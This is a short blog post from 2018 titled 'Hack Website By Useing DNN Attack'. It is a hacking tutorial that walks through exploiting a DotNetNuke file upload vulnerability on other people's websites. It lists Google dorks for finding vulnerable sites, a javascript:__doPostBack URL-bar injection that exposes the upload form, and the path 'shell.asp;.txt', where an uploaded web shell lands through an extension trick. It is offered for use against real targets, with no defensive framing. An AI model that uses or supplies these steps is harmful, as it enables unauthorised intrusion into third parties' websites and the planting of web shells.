Saturday, April 28, 2018
Hack Website By Useing DNN Attack
Hack Website By Useing DNN Attack
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiOyofLVOZunFIZWOT3he280VWLqkXmmkQhwtK2DH3lzsT1AFjqSF7-H2UyhSb-Eir_lg6deFloXDAXx0f-fiiOaS4f1w2qq8-d4h8FaFdOlSCExcEBvhPzPo35JFLOWcjaJl32Gti0Aho/s1600/HACk+WEBSITE+by+useing+DNN+Attack.jpg)
What Is DNN ?
DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading
vulnerrability.
Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks :
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx
I got a target
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG3cdeQuBoIgP-JDcW_eDVqP069lpybvwrywGseFQezTvS9Iij1-3Bw25PVQv-4QTunvm129kU_nTs1Ov8_Gye8WgrjK7RU2i3zVV11Qmubmc6rIyBXKyjOU-tFJoNteugdzysnFyOdHZY/s400/Screenshot_1.png)
Select "File" from list.
The in url bar paste the javascript ;
javascript:__doPostBack(ctlURL$cmdUpload,)
Now there appear a uploading bar on page. As seen be below :![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS0JtB4mCogybD-hOoOPiyYbMcdUwZO5FSzTanw_FPINKcnIuRTHv3ra3FuuPa0ACdKtu6OonjsIWRdyyfi_GenJD_NgyMe2Pe5-Vfj0yGU_1Io-XVmP4j4Pfk_ARMgiYRbaR7up9iIcqW/s400/Screenshot_2.png)
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgryFyfl4vKkLgRERRZTNF_fVFhVdW_tOjIa4LRYg0Cwg4OH800U9KyciHyqhXDoQ-OZjiBdccr65Ht7DhaqNyVklXDhJ9HSq1sdf0gtWhQZUXHRLpa_6CBi_uF2NRaV1lzrE4-V81C7uEK/s400/Screenshot_3.png)
Hope You Enjoy....! By WARRIOR
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.